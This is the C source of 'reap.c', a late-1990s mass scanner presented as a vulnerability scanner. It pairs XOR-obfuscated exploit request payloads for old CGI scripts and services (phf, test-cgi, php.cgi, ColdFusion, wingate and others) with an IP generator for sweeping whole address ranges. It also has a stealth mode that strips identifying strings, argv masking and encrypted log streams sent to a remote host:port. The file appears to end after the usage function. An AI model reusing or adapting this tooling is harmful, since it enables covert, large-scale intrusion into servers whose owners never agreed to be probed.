/*
VERSION 2.9
*/
/*
|
|  reap.c -- network vulnerability scanner
|  Copyright (C) 1997-2000 UNiC
|
*/
/*
|
|  This program is free software; you can redistribute it and/or modify
|  it under the terms of the GNU General Public License as published by
|  the Free Software Foundation; either version 2 of the License, or
|  (at your option) any later version.
|
|  This program is distributed in the hope that it will be useful,
|  but WITHOUT ANY WARRANTY; without even the implied warranty of
|  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
|  GNU General Public License for more details.
|
|  You should have received a copy of the GNU General Public License
|  along with this program; if not, write to the Free Software
|  Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
|
*/

#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <unistd.h>
#include <string.h>
#include <pwd.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/resource.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <fcntl.h>
#include <signal.h>
#include <errno.h>
#include <sys/wait.h>
#include <ctype.h>

/*
 *  Get rid of as many of the revealing strings in the binary as possible.
 */
#undef	STEALTH_MODE

#ifndef STEALTH_MODE
char	REAP_C_VERSION[] = "@(#)reap.c 2.9 Copyright (C) 1997-2000 UNiC";
#endif

#if (__GNUC__ >= 2) && (__GNUC_MINOR__ >= 8)
#define __asmargs__(x,y)			\
	y __attribute__ ((regparm (x)));	\
	y
#else
#define __asmargs__(x,y)			\
	y
#endif

#undef uchar
#undef ulong
#undef ushort
#define uchar	unsigned char
#define ulong	unsigned long
#define ushort	unsigned short

#ifndef TRUE
#define TRUE 1
#endif
#ifndef FALSE
#define FALSE 0
#endif

#ifndef IPPROTO_TCP
#define IPPROTO_TCP	6
#endif

#define SUB_RANGE	0
#define ADD_RANGE	1

#define MAXSOCK	1100

#define HIT	'!'
#define MISS	'.'

#define _NETUNREACH	-2
#define _NORESOLV	-3
#define _NOSOCKET	-4
#define _NONEWHOST	-5
#define _NONEW		-6
#define _NONETWORK	-100

typedef struct CompactIPStruct
{
	uchar	a;
	uchar	b;
	uchar	c;
	uchar	d;

} aCIP;

#define IPR_GENTAB	1

typedef struct IPRange
{
	struct	IPRange *next;

	int	type;

	uchar	a[256];
	uchar	b[256];
	uchar	c[256];
	uchar	d[256];

	char	*filename;
	aCIP	*ciplist;

} aIPrange;

typedef struct PushStruct
{
	int	port;
#ifndef STEALTH_MODE
	uchar	*name;
#else /* STEALTH_MODE */
	ushort	xsum;
#endif /* STEALTH_MODE */
	uchar	*req;
	int	len;

} aPush;

typedef struct PushChain
{
	struct	PushChain *next;
	aPush	*which;

} aChain;

typedef struct HostStruct
{
	int	sock;
	uchar	*buf;
	aPush	*which;
	ulong	lasttime;
	int	pump;
	int	hasdata;

} aHost;

uchar push1[] =
	"\x59\xaf\xf6\x49\xdb\x8d\x84\xbf\x4e\x6b\xb0\xb2\x97\xff\xc6\xba\xde\x94\x73\x04"
	"\x32\x1f\xa4\xd9\x42\x96\x5f\xb9\xfe\xfd\xd9\x16\x94\x63\x96\x12\xb5\x6e\x91\x22"
	"\x3e\xf3\xf5\x4b\xe9\xbb\x9d\x34\x9d\x35\xf3\xd8\x62\x8d\xc4\xf2\xca\x43\x6b\xe9"
	"\xc2\x02\x4b\xd3\x92\x6a\xee\x58\xc8\xcf\xa8\x15\xe9\xe2\x44\x79\xa7\x64\x9f\x69"
	"\x5d\x65\x35\xf2\xb4\x49\xec\x5c\x2b\xfd\x9c\x7f\x36\xaa\x2e\x44\x31\x05\x16\x9d"
	"\x72\x50\x6f\x84\xfb\x87\x54\xe2\x2f\x54\xe9\xcf\xb4\x4d\xe1\x5e\x16\xf0\xe7\xcb"
	"\x58\x8b\x15\x8c\xb4\x0b\x86\x55\xd3\x9d\x7d\x16\x9f\x27\xe5\xcc\x29\x88\x32\x1b"
	"\x15\x8a\x12\xbe\x22\x04\x5c";
uchar push2[] =
	"\xe8\x9f\x0c\x40\xe0\x0f\x3a\x51\x2e\x0f\x3b\x24\x52\x71\x57\xb9\xef\x57\xb2\x99"
	"\xd6\x05\x5c\x21\x83\xa6\xc5\xc3\xe4\x0f\x2a\xb1\x83\xe5\xdb\xf9\x0b\xad\xa4\x8d"
	"\x85\xc3\x8f\xd3\xf5";
uchar push3[] =
	"\x4d\xbe\x41\x92\x4c\xf4\x8a\x12\xee\x6f\xf3\x85\xb2\xad\xd8\x48\x55\xce\xed\x31"
	"\x0e\x2e\x4e\x63\xa5\xde\xf8\x05\x38\x4c\xf4\x8a\x09\xa0\x6d\xc1\x05\x3e\xd6\x1a"
	"\x30\x3f\xc6\xc7\xeb\x4e\x56\xfb\xd9\x5f\xa6\x8f\xad\xe8\xd5\x29\xfe\x87\x68\x0c"
	"\x19\x35\xc3";
uchar push4[] =
	"\x03\x17\x52\x0e\x16\xda\xc2\x21\xcd\x4b\x92\x6a\xeb\x6d\xe4\x08\xdd\xa8\x6c\xbe"
	"\x43\x50\x79\x8b\x77\xb1";
uchar push5[] =
	"\x2c\x88\x17\x73\x3c\x0a\xc9\x66\x4e\x08\xb8";
uchar push6[] =
	"\x2e\x65\x56\xee\x42\xc1\x34\xcb\x54\xa1\x15\x8a\x08\x97\xf2\xdf\x64\x8c\xf5\x70"
	"\x2f\x1c\xb4\x4d\x9e\x5c\x25\x3e\xf7\x14\xfe\xe2\x63\x84\xf9\x6f\x98\xc1\x33\xb0"
	"\xe0\x41\xb2\x9d\x73\x3a\x13\x87\x11\xee\x06\xa7\x62\xaf\xd4\x7c\x45\x40\xe5\xa3"
	"\xc4\xbc\xac\x20\xb4\x7c\x0b\xcc\x7a\xc6\xc0\x4a\xa6";
uchar push7[] =
	"\x20\xb0\x9f\x1a\x02\x0e\x6d\xa8\x7f\x00\x2d\x69\x06\xe4\x53\x01\x72\x4d\x9f\x64"
	"\x9f\x2e\x4b\x9d\x53\x21\xa3\xf5\x2c\xc5\x9d\x2b\xd7\x12\xf1\xc9\x7b\x68\x36\xae"
	"\x8f\xad\xf2\xce\xe7\xfb\xad\xa1\x7d\x78\xa7\x6f\x8d\xce\xec\x40\xed\x27\xe4\x12"
	"\xf9\x2b\xb5\x79\xff\xd9\x75\x89\x4f";
uchar push8[] =
	"\x07\xe6\xef\x2d\x2b\xf2\xdd\xbc\x8d\x86\x68\x31\x09\xe0\x50\x56\xde\x9b\x9e\x42"
	"\x8f\xb5\x3a\x18\x4b\xda\xff\xd6\x15\xcd\x45\x1c\xaa\x68\x77\x9f\x67\x6e\xcc\x7a"
	"\xd9\x51\x69\x40\xee\x4c\xfb\xe8\xac\x17\x3e\xe2\x2f\x4a\xd5\x54\xe8\xf8\x00\x54"
	"\xd8\x38\x27\xb0\xfe\xe2\x44\x16\xfa";
uchar push9[] =
	"\x25\x14\x89\x1b\x4d\xc4\xff\x8e\xab\x70\x72\x57\xbf\x06\xe2\x2f\x57\xb5\x2f\x5c"
	"\x36\xf5\x7b\x36\xb9\xfe\xa6\xd6\x15\x86\x7e\x31\x48\x08\xd9\x0c\x67\x36\xbe\x6e"
	"\xdd\xbf\x48\x0c\x75\xbe\x56\xd5\x54\xe2\x22\x61\xd6\x5e\x52\x16\xae\xf6\x4a\x89"
	"\x7e\x7c\x14\xc6\xc0\x40";
uchar pushA[] =
	"\x15\xc3\xb4\x1d\xcf\xb9\xa4\x93\x57\xb8\xe6\x85\x98\xdb\xc5\xb9\x9f";
uchar pushB[] =
	"\x6f\xbe\x57\x85\xd3\xda\xf5\x64\x95\x4e\x60\xc9\x61\x98\xdf\x6c\xd6\x5e\x1b\x1e"
	"\xc6\xe4\x1f\xae\xcb\x02\x4a\xcf\xea\x72\x52\x31\x04\x61\x8c\xe1\x59\x9e\x5f\xec"
	"\x11\xb5\x73\x78\xa9\x14\xa5\xb7\x4a\xc3\xe6\xc2\x01\x32\x4c\xe4\x15\x87\x0c\x63"
	"\x80\xe2\x2a\xaf\xca\x52\x7e\x1a\x02\x7a\xa6\xc5\x82\x80\xb0\xda\x9c\x04";
uchar pushC[] =
	"\xf7\x76\xdf\x5d\x7b\x22\x6d\xac\x1d\xb6\x38\x61\xd9\x50\x51\x20\x8c\xfd\xd6\x4a"
	"\xd5\x46\x65\x2b\xed\x37\xb8\xce\xd1\xfa\x29\x94\x0f\x14\x88\x05\x2c\x91\x64\x94"
	"\x23\x79\xe4\x19\x5c\x2c\x9b\xb2\x97\xf5\x2e\x43\x62\xa2\xe7\xac\x04\x2f\x5c\x18"
	"\x13\xc0\x2e\x43\x68\x3d\x24\x11\xe6\xf6\x21\x9e\x56\x81\xf2\xc8\x99\xd3\xd1\x84"
	"\x91\x43\x3e\xb2\xb6\x0e\x16\xaa\x69\x5e\x5c\x74\x66\x20\xe0";
uchar pushD[] =
	"\x3b\x4d\x8c\xe1\x52\x2d\x7f\x69\x08\xcd\x0e\x31\x13\xb5\x36\xb4\x4d\x86\x6f\xd9"
	"\x52\x3f\x92\x77\xd5\x23\x25";
uchar pushE[] =
	"\x63\xa2\xcb\x69\x4f\x36\xf5\x60\xc7\x88\x15\x81\xfe\xbc\xc4\xd4\x58\xbc\xb4\x03"
	"\x74\x42\xde\xf8\x42\xee";
uchar pushF[] =
	"\x18\x78\x87\x72\x6a\xa6\xc5\xd0\xd7\x38\x25\x31\x0e\x2c\xdb\xdd\xbe\x60\xcc\x74"
	"\x24\x68\x0c\x44\x33\xa4\x92\x2e\x2f\x33\xd6\x55\xcd\x1f\xac\x1a\x22\x23\x49\xea"
	"\x68\x3f\xdd\xb3\x2f\x19\x0e\x73\x61\xba\xbc\xe9\xe5\xe0\x59\x8c\xe0\x45\x5e\x5a"
	"\x34\xc9\x77\xd4\x6f\xd9\x4d\xd5\x05\x42\xd5\x46\x29\xc7\x8e\xe2\x69\x2c\x9b\x83"
	"\xb1\x82\xc0\x34\x81\xe3\x1c\xf4\x89\x75\xa3\xd1\xa2\xf6\x6e\xcd\x1b\x01\x76\xf3"
	"\xbb\xea\x3d\x1e\xd1\xaf\xd6\x01\x72\x5d\x33\xfa\x56\x9d\x60\xff\x99\xda\xe4\x10"
	"\x5d\x39\x7a\x91\x6e\x8c\xcb\x40\xe7\xfa\x03\x2b\xbc\x89\x2a\xe6\x87\x40\xfb\xe4"
	"\x18\x13\xc2\x55\xc6\xa9\x47\x0e\x62\xe9\x94\x13\xc5\xd6\x48\x14\xe1\x52\x30\x34"
	"\xf3\xa8\x3f\x8b\x54\xb7\x7b\x0d";
uchar pushG[] =
	"\x12\xcf\xcc\x1d\xcf\x93\x35";
uchar pushH[] =
	"\x82\xe9\xaa\x12\xbe\x3d\x18\x4f\x70\x3d\x19\x56\xd4\x23\x43\x64\x84\xaf\xcc\x26"
	"\x1c\xe1\x4e\x3d\x54\xee\x0b\x93\x1a\x23\x4b\xdc\xa9\x4a\x83\xf7\x01\x3a\x57\xf4"
	"\xdc\xa5\xfc\xd1\xb4\x5e\x5d\x39\x76\xf4\xc3\xec\x50\x15\xd3\x94\x29\xcc\x3c\x0b"
	"\xd8\x5a\x26\x03\x21\xda\xf0\xf1\xdf\x7a\x83\xb7\x07\xc4\xe5\x99\xb5\x43";
uchar pushI[] =
	"\x78\x98\xe7\x92\x4a\x86\x25\x30\x37\x98\x85\x91\x6e\x8c\xbb\xa3\xd5\x4b\x90\x84"
	"\xb9\xec\x40\xed\x28\xff\x80\xa0\x28\xcc\x00\x50\x1f\xf8\x66\x1a\x5c\x07\xce\xec"
	"\x40\xa5\xbd\x8f\xf4\x98\xd1\xb7\x14\xf6\x3a\x1c\x8e\x81\xf8\x26\x1e\xd7\x3f\xdd"
	"\xf6\x76\xff\x87\x46\x3e\xfa\x4c\xf4\xdc\xce\x88\x38";
uchar pushJ[] =
	"\x7f\x21\xb2\xbf\x6d\xeb\x32\x1d\xfc\xcd\x46\x28\xf1\xc9\x20\x89\x21\x91\x68\x6a"
	"\xf1\xd0\xc7\xc1\x1f\x9d\x4f\x49\xa0\x51\x69\x5f\x83\xcf\x99";
uchar pushK[] =
	"\x20\xea\x0c\x14";
uchar pushL[] =
	"\xcd\x2c\xb1\xb3\x35\xec\x57\xb6\x33\xb8\xea\x6f\x97\xbe\x7a\x82\xc9\x7d\x5e\x02"
	"\x00\x63\x82\xc7\xce\xe4\x15\x8f\xbc\xd9\x1c\xe3\x0c\x39\x7d\x52\x30\x7f\x01\x63"
	"\x82\xdc\xa1\x07\x8f\xba\xd1\xae\x84\xaf\xcd\x12\xf2\xdb\x90\x80\xf2\xdb\x92\x40"
	"\xe5\xa1\x44\x39\x2d\x3a\x16\xb2\xaa\x12\xce\xad\xba\x98\x98\xa2\x84\xdc";
uchar pushM[] =
	"\xee\x25\x16\xae\x82\x81\xf4\x8a\x02\x41\xb4\x5f\xa6\x8f\xa1\x07\xc4\xea\x67\x2d"
	"\x24\x53\x05\x16\x94\x2a\xaf\xd5\x46\x64\x9f\x2f\x54\xac\x3c\x30\x04\x0c\x3b\x7c"
	"\x0a\xd6\x30\x5a\x16";
uchar pushN[] =
	"\xb9\xd8\x2d\x5f\xa9\x00\x63\x82\xc7\xcc\x36\xb3\x7b\x22\x78\xa1\x12\xe9\xc2\x1d"
	"\xf4\x99\xcd\x08\xdd\xe4\x1f\xae\xcb\x10\x12\xf7\x5f\xa6\x9c\x6d\xae\xd5\x0e\x31"
	"\x08\xcd\x19\x5c\x21\xd7\x19\x6b\xc9\x5f\xa6\xdb\x83\xf5\x09\xc5\xb3";
uchar pushO[] =
	"\x44\x5b\x68\x0c\x34\x83\xa6\x8d\xc2\x43\x67\x28\xf6\x35\xb4\x44\x73\x3c\x17\x4e"
	"\x70\x71\x50\x1e\xd1\xa0\x09\xf0\xf6\x6b\xf9\x31\x5a\x33\xa5\xb2\x9b\x8e\xaa\x29"
	"\x84\xb5\x27\xac\x03\x2d\x64\x95\x10\x5d\x29\xce\xf5\x26\x5a\x77\xc6\xef\x49\xee"
	"\x0b\x99\x9a\xe6\xcb\x48\x16\x9b\x80\xe5\xb8\xa5\xb2\xde\xba\xe2\x1a\x06\xa5\xe2"
	"\x60\x90\xfa\x7c\x24";
uchar pushP[] =
	"\x79\x97\xd4\x4d\xaf\x99\x90\x93\x52\x37\xdc\xa6\x83\xab\x72\x49\xea\x64\x8f\xbc"
	"\x8a\x02\x43\x64\x95\x0f\x79\x97\xc5\xe7\x91\x28\xa9\x01\x27\x8b\x77\xb1";

#define	PwLen(x)	x, sizeof(x)-1

#ifdef STEALTH_MODE

#define xory(x,y)	x

#else /* STEALTH_MODE */

#define xory(x,y)	y

#endif /* STEALTH_MODE */

#define AGLIMPSE	xory( 0xd1b0, "aglimpse" )
#define CAMPAS		xory( 0x526b, "campas" )
#define COLDFUSION	xory( 0x6b5c, "ColdFusion" )
#define FAXSURVEY	xory( 0x9feb, "faxsurvey" )
#define FINGERD		xory( 0x9c37, "fingerd" )
#define FTPD		xory( 0xb7aa, "ftpd" )
#define GUEST		xory( 0x92e8, "guest" )
#define HANDLER		xory( 0xa468, "handler" )
#define HTGREP		xory( 0xb4a1, "htgrep.cgi" )
#define INDEX		xory( 0x05aa, "index" )
#define INFO2WWW	xory( 0xad91, "info2www" )
#define NPHTESTCGI	xory( 0x5e27, "nph-test-cgi" )
#define PERL		xory( 0x9589, "perl" )
#define PFDISPALY	xory( 0x40d9, "pfdispaly.cgi" )
#define PHF		xory( 0x9462, "phf" )
#define PHP		xory( 0x22b1, "php.cgi" )
#define POP		xory( 0x10f9, "pop" )
#define REMWATCH	xory( 0x0031, "remwatch" )
#define SMTP		xory( 0xefe2, "smtp" )
#define TESTCGI		xory( 0xcb86, "test-cgi" )
#define VIEWSOURCE	xory( 0x87bb, "view-source" )
#define WEBDIST		xory( 0xbb2f, "webdist.cgi" )
#define WEBSENDMAIL	xory( 0x5d93, "websendmail" )
#define WHOISRAW	xory( 0xff72, "whois_raw.cgi" )
#define WINGATE		xory( 0x15b5, "wingate" )

aPush scan_types[] =
{
	{ 80,	AGLIMPSE,	PwLen(pushC)	},
	{ 80,	CAMPAS,		PwLen(push6)	},
	{ 80,	COLDFUSION,	PwLen(pushM)	},
	{ 80,	FAXSURVEY,	PwLen(pushH)	},
	{ 79,	FINGERD,	PwLen(push5)	},
	{ 21,	FTPD,		PwLen(push3)	},
	{ 80,	HANDLER,	PwLen(push9)	},
	{ 80,	HTGREP,		PwLen(pushL)	},
	{ 80,	INDEX,		PwLen(pushE)	},
	{ 80,	INFO2WWW,	PwLen(pushJ)	},
	{ 80,	NPHTESTCGI,	PwLen(pushI)	},
	{ 80,	PERL,		PwLen(pushF)	},
	{ 80,	PFDISPALY,	PwLen(push8)	},
	{ 80,	PHF,		PwLen(push1)	},
	{ 80,	PHP,		PwLen(push2)	},
	{ 110,	POP,		PwLen(pushG)	},
	{ 512,	GUEST,		PwLen(pushD)	},
	{ 5556,	REMWATCH,	PwLen(pushA)	},
	{ 25,	SMTP,		PwLen(push4)	},
	{ 80,	TESTCGI,	PwLen(push7)	},
	{ 80,	VIEWSOURCE,	PwLen(pushN)	},
	{ 80,	WEBDIST,	PwLen(pushB)	},
	{ 80,	WEBSENDMAIL,	PwLen(pushP)	},
	{ 80,	WHOISRAW,	PwLen(pushO)	},
	{ 23,	WINGATE,	PwLen(pushK)	},
	{ 0,	0,		NULL,0,		},
};

aChain	scan_all[] =
{
	{ &scan_all[1],		&scan_types[0]		},
	{ &scan_all[2],		&scan_types[1]		},
	{ &scan_all[3],		&scan_types[2]		},
	{ &scan_all[4],		&scan_types[3]		},
	{ &scan_all[5],		&scan_types[4]		},
	{ &scan_all[6],		&scan_types[5]		},
	{ &scan_all[7],		&scan_types[6]		},
	{ &scan_all[8],		&scan_types[7]		},
	{ &scan_all[9],		&scan_types[8]		},
	{ &scan_all[10],	&scan_types[9]		},
	{ &scan_all[11],	&scan_types[10]		},
	{ &scan_all[12],	&scan_types[11]		},
	{ &scan_all[13],	&scan_types[12]		},
	{ &scan_all[14],	&scan_types[13]		},
	{ &scan_all[15],	&scan_types[14]		},
	{ &scan_all[16],	&scan_types[15]		},
	{ &scan_all[17],	&scan_types[16]		},
	{ &scan_all[18],	&scan_types[17]		},
	{ &scan_all[19],	&scan_types[18]		},
	{ &scan_all[20],	&scan_types[19]		},
	{ &scan_all[21],	&scan_types[20]		},
	{ &scan_all[22],	&scan_types[21]		},
	{ &scan_all[23],	&scan_types[22]		},
	{ &scan_all[24],	&scan_types[23]		},
	{ NULL,			&scan_types[24]		},
};

#define MAXENV		5

uchar	envs[MAXENV][10] =
{
	"\0\0\0\0\0TYPE\0",
	"\0\0\0\0\0IPS\0\0",
	"\0\0\0\0\0UID\0\0",
	"\0\0\0\0\0LOG\0\0",
	"\0\0\0\0\0ARG\0\0"
};

#define __scan_type	envs[0]
#define __scan_ips	envs[1]
#define __scan_uid	envs[2]
#define __scan_log	envs[3]
#define __scan_arg	envs[4]

extern	char *optarg;

struct	in_addr cip;
aHost	hst[MAXSOCK];
ulong	st_time;
char	hostbuf[160];
char	*start_host;
char	*putbuf_new;
uchar	inet_xor[10];
FILE	*hostfile;
int	opensock;
int	con_ct,set_to_nocon;
int	pr_m,st_cnt,dofork;
int	nocon = -1;
int	maxbuf = 15000;
int	putbuf_len;
int	socknum;
int	out_fd;
int	xor_ct;
int	opt_inet_fd;
int	opt_inet_encrypt;
int	opt_ipsmode;
int	opt_nohtml;
int	opt_multiscan;
time_t	now;

#ifndef STEALTH_MODE
char	pgchar;
int	pr_willcount,progress,pr_cnt;
#endif /* STEALTH_MODE */

aIPrange *IPRrange;
aIPrange *curr;

short	c_ipa,c_ipb,c_ipc,c_ipd;

aChain	*c0,*cn;

uchar	biggo[65536];

void xout(char *format, ...)
{
	va_list	msg;
	int	z;

	va_start(msg,format);
	vsprintf(biggo,format,msg);
	va_end(msg);

	z = strlen(biggo);
	if (opt_inet_fd && opt_inet_encrypt)
	{
		uchar	*p;

		p = biggo;
		while(*p)
		{
			*p = *p ^ inet_xor[xor_ct];
			xor_ct++;
			if (xor_ct >= 10)
				xor_ct = 0;
			p++;
		}
	}
	if (write(out_fd,biggo,z) < 0)
		exit(1);
}

__asmargs__(1,
void utc_timestamp(int force))
{
	struct	tm *tt;
	time_t	now;

	time(&now);
	tt = gmtime(&now);
	if (!force)
	{
		if ((tt->tm_sec != 0) || ((tt->tm_min % 10) != 0))
			return;
	}
	xout("** UT: %s",asctime(tt));
}

__asmargs__(3,
int addIPrange(int mode, char *pb, char *pe, aIPrange *range, int which))
{
	int	ib,ie;
	int	i;

	ib = atoi(pb);
	ie = (pe && *pe) ? atoi(pe) : -1;

	if ((ib < 0) || (ib > 255) || (ie < -1) || (ie > 255))
		return(-1);
	if ((ie <= ib) && (ie != -1))
		return(-1);
	if (ie == -1)
		ie = ib;

	for(i=ib;i<=ie;i++)
	{
		switch(which)
		{
		case 0:
			range->a[i] = mode;
			break;
		case 1:
			range->b[i] = mode;
			break;
		case 2:
			range->c[i] = mode;
			break;
		case 3:
			range->d[i] = mode;
			break;
		}
	}

	return(0);
}

__asmargs__(3,
int initiprange(char *arg, aIPrange *range, int which))
{
	char	*p,*pb,*pe;
	int	mode;

	mode = ADD_RANGE;
	pb = p = arg;
	pe = NULL;
	while(p && *p)
	{
		switch(*p)
		{
		case '0':
		case '1':
		case '2':
		case '3':
		case '4':
		case '5':
		case '6':
		case '7':
		case '8':
		case '9':
			break;
		case '!':
			*p = 0;
			if (addIPrange(mode,pb,pe,range,which) < 0)
				return(-1);
			pb = p + 1;
			pe = NULL;
			mode = SUB_RANGE;
			break;
		case '&':
			*p = 0;
			if (addIPrange(mode,pb,pe,range,which) < 0)
				return(-1);
			pb = p + 1;
			pe = NULL;
			mode = ADD_RANGE;
			break;
		case '-':
			*p = 0;
			pe = p + 1;
			break;
		default:
			return(-1);
		}
		p++;
	}
	addIPrange(mode,pb,pe,range,which);
	return(0);
}

void getip_init(void)
{
	c_ipa = 0;
	c_ipb = 0;
	c_ipc = 0;
	c_ipd = 0;

	while(curr->a[c_ipa] == 0)
		c_ipa++;
	while(curr->b[c_ipb] == 0)
		c_ipb++;
	while(curr->c[c_ipc] == 0)
		c_ipc++;
	while(curr->d[c_ipd] == 0)
		c_ipd++;
}

__asmargs__(1,
void initipgen(char *arg))
{
	aIPrange *ipr;
	char	*current,*cn;
	char	*p,*pn;
	int	i;

	arg = strdup(arg);
	xout("** IG: %s\n",arg);
	while(TRUE)
	{
		current = strtok(arg,",");
		cn = strtok(NULL,"");

		if (current && *current)
		{
			curr = (aIPrange*)calloc(1,sizeof(aIPrange));
			if (!curr)
				exit(1);

			p = current;
			curr->type = IPR_GENTAB;
			for(i=0;i<4;i++)
			{
				p = strtok(p,".");
				pn = strtok(NULL,"");
				if (!p)
					exit(1);
				if (initiprange(p,curr,i) < 0)
					exit(1);
				p = pn;
			}

			if (!IPRrange)
				IPRrange = curr;
			else
			{
				ipr = IPRrange;
				while(ipr->next != NULL)
					ipr = ipr->next;
				ipr->next = curr;
			}
		}

		if ((cn == NULL) || (*cn == 0))
			break;
		arg = cn;
	}
	curr = IPRrange;
	getip_init();
	opt_ipsmode = TRUE;
	free(arg);
}

int getip_gentab(void)
{
	char	ipstr[32];
	int	touch,tt;

	if (set_to_nocon != 0)
	{
		nocon = set_to_nocon;
		set_to_nocon = 0;
	}

	if (nocon == -2)
		return(FALSE);

	sprintf(ipstr,"%i.%i.%i.%i",c_ipa,c_ipb,c_ipc,c_ipd);
	cip.s_addr = inet_addr(ipstr);

	touch = FALSE;
	c_ipd++;
	while(TRUE)
	{
		if (curr->d[c_ipd] == 0)
			c_ipd++;
		else
			break;
		if (c_ipd >= 256)
		{
			c_ipd = 0;
			c_ipc++;
			touch = TRUE;
		}
	}
	tt = touch;
	touch = FALSE;
	while(tt)
	{
		if (curr->c[c_ipc] == 0)
			c_ipc++;
		else
			break;
		if (c_ipc >= 256)
		{
			c_ipc = 0;
			c_ipb++;
			touch = TRUE;
		}
	}
	tt = touch;
	touch = FALSE;
	while(tt)
	{
		if (curr->b[c_ipb] == 0)
			c_ipb++;
		else
			break;
		if (c_ipb >= 256)
		{
			c_ipb = 0;
			c_ipa++;
			touch = TRUE;
		}
	}
	while(touch)
	{
		if (curr->a[c_ipa] == 0)
			c_ipa++;
		else
			break;
		if (c_ipa >= 256)
		{
			if (curr->next)
			{
				curr = curr->next;
				getip_init();
			}
			else
				set_to_nocon = -2;
			break;
		}
	}

	return(TRUE);
}

int getip(void)
{
	switch(curr->type)
	{
	case IPR_GENTAB:
		return(getip_gentab());
	default:
		exit(1);
	}
}

__asmargs__(1,
int is_number(char *arg))
{
	char	*pt;

	pt = arg;
	while(*pt)
	{
		if ((*pt < '0') || (*pt > '9'))
			return(FALSE);
		pt++;
	}
	return(TRUE);
}

char *nexthost(void)
{
	char	*buf,*end;

	hostbuf[0] = 0;
	if (nocon == -2)
		return(NULL);
	buf = fgets(hostbuf,160,hostfile);
	if (buf == NULL)
		hostbuf[0] = 0;
	if (hostbuf[0] == 0)
	{
		nocon = -2;
		return(NULL);
	}
	end = buf;
	while ((*end != ' ') && (*end != 0) && (*end != '\n') && (*end != '\r'))
		end++;
	*end = 0;
	return(buf);
}

__asmargs__(2,
int newsock(aHost *hst, time_t now))
{
	static	struct sockaddr_in serv;
	struct	hostent *hp;
	struct	in_addr *inh;
	struct	linger slinger;
	char	*hostname;
	int	x,s;

	hst->sock = -1;

	if (nocon == -2)
		return(_NONEW);

	if ((s = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP)) < 0)
	{
		socknum = 0;
		return(-1);
	}
	socknum--;

	fcntl(s, F_SETFL, O_RDWR|O_NONBLOCK);

	slinger.l_onoff = 0;
	setsockopt(s, SOL_SOCKET, SO_LINGER, (char *)&slinger, sizeof(slinger));

	if (cn == c0)
	{
		if (opt_ipsmode)
		{
			if (getip())
			{
				serv.sin_addr.s_addr = cip.s_addr;
				sprintf(hostbuf,"%s\n",inet_ntoa(cip));
			}
			else
				return(_NONEWHOST);
		}
		else
		{
			hostname = nexthost();
			if (hostname == NULL) return(_NONEWHOST);
			x = strlen(hostname);
			if (hostname[x-1] == '\n')
			{
				hostname[x-1] = '\0';
				x--;
			}
			if ((hostname[x-1] >= '0') && (hostname[x-1] <= '9'))
				serv.sin_addr.s_addr = inet_addr(hostname);
			else
			{
				hp = gethostbyname(hostname);
				now = time(NULL);
				if (hp == NULL)
				{
					return (_NORESOLV);
				}
				inh = (struct in_addr *)(hp->h_addr_list[0]);
				serv.sin_addr.s_addr = (ulong)(inh->s_addr);
			}
		}
		serv.sin_family = AF_INET;
	}
	serv.sin_port = htons(cn->which->port);

	st_cnt++;
#ifndef STEALTH_MODE
	if (progress)
	{
		pr_cnt++;
		if (pr_cnt > pr_willcount)
		{
			pr_cnt -= pr_willcount;
			putc(pgchar,stderr);
			fflush(stderr);
			pgchar = MISS;
			pr_m++;
			if (pr_m >= 60)
			{
				char	*cur;

				fprintf(stderr," (");;
				cur = hostbuf;
				while(*cur)
				{
					putc(*cur,stderr);
					cur++;
					if (*cur == '\n')
						break;
				}
				fprintf(stderr,")\n");
				fflush(stderr);
				pr_m -= 60;
			}
		}
	}
#endif /* STEALTH_MODE */

	if (connect(s,(struct sockaddr *)&serv,sizeof(serv)) < 0)
	{
		switch (errno)
		{
			case EINPROGRESS:
				break;
#ifndef STEALTH_MODE
			case ENETUNREACH:
				close(s);
				socknum++;
				return(_NETUNREACH);
#endif /* STEALTH_MODE */
			default:
				close(s);
				socknum++;
				return(-1);
		}
	}
	hst->which = cn->which;
	hst->pump = 0;
	hst->hasdata = 0;
	hst->lasttime = now;
	hst->sock = s;

	if ((cn = cn->next) == NULL)
		cn = c0;

	return(s);
}

void sig_show(int dummy)
{
	signal(dummy,sig_show);
	xout("** CI: %s\n",(hostbuf[0]) ? hostbuf : "<NULL>");
}

void sig_die(int dummy)
{
	signal(dummy,sig_die);
	xout("** SD: %s\n",(hostbuf[0]) ? hostbuf : "<NULL>");
	nocon = -2;
}

void usage(void)
{
#ifndef STEALTH_MODE
	fprintf(stderr,"Usage: reap [options ...]\n%s\n%s",
	REAP_C_VERSION,
	"-b                       Run as a background process\n"
	"-C <timeout>             Set connect-to-host timeout in seconds (5 seconds by default)\n"
	"-E                       Do *NOT* encrypt inet log streams. Use this if you use any other\n"
	"                         program than reapdump (rd) to receive inet log stream\n"
	"-F                       Dont auto-fork every 10 minutes\n"
	"-f <file>                Read hosts/IP-addresses from <file>\n"
	"-g <gen_pattern[,...]>   Autogenerate IP addresses to scan according to <gen_pattern>\n"
	"                         Use \"&x[-y]\" to include a range or single IP segment\n"
	"                         Use \"!x[-y]\" to exclude a range or single IP segment\n"
	"                         Eg: -g 1-254!10!127.0-255.0-255.1-254 (the whole Internet ;))\n"
	"                         {env: SCAN_IPS}\n"
	"-h                       Show this help\n"
	"-n <maxsock>             Limit number of open sockets to <maxsock>\n"
	"-o <file|host:port>      Send log output to <file> or <host:port>\n"
	"                         {env: SCAN_LOG}\n"
	"-P <number>              Progress indicator, print one dot for each <number> hosts\n"
	"-p                       Progress indicator, print one dot for each 100 hosts\n"
	"                         Progress is printed to STDERR\n"
	"-q <argv>                Quash argv to display only <argv>\n"
	"-l                       List supported exploits\n"
	"-t <timeout>             Set wait-for-data timeout in seconds (10 seconds by default)\n"
	"-u <uid|username>        Run process under given (users) uid\n"
	"                         {env: SCAN_UID}\n"
	"-V                       Print version and exit\n"
	"-x <exploit[,...]>       Scan for <exploit[,...]> (phf by default)\n"
	"                         Use a comma delimited list of exploits to scan for more than\n"
	"                         one simultaneously\n"
	"                         Eg: -x phf,perl,aglimpse\n"
	"                         {env: SCAN_TYPE}\n"
	"-z                       Remove all HTML tags before writing to log\n"
	);
	fflush(stderr);
#endif /* STEALTH_MODE */
	exit(0);
}

